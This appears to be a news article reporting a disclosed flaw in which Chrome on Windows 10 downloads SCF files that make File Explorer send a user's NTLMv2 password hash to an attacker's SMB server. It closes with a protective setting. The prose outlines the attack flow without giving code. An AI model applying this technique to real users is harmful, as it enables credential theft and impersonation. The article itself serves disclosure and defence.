Given the recent Google discovery of a flaw in Windows Defender, and the Google discovery of a flaw in Internet Explorer and Edge, it would appear that Google and Microsoft aren’t exactly friendly when it comes to working together. This time, however, a new flaw has been discovered which could perhaps have both tech giants to blame, as hackers can exploit the flaw so they could use Chrome in Windows 10 to steal passwords (via ZDNet)
While Google has said it is working on a fix for this flaw, DefenseCode security researcher Bosko Stankovic recently detailed how the flaw could trick the latest version of Chrome in Windows 10 into downloading a SCF file (show desktop icon shortcut) that can trick Windows (and help hackers) into capturing a user’s LAN Manager (NTLMv2) password hash.
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon“. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password.
Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources.
The primary use case of this flaw is the way in which Chrome and Windows handle SCF files. Chrome does not label these types of files as malicious and does not scan these files for malicious intent, and Chrome relies on the default Windows settings once the file is downloaded. Because of this, the user does not even need to click or open the file, and Windows Explorer will automacially try to retrieve the icon when the user goes into the download directory, causing the capturing of the LAN Manager (NTLMv2) password hash.
To protect yourself, it is recommended for you to go to Settings> Show advanced settings> and Check the “Ask where to save each file before downloading” option.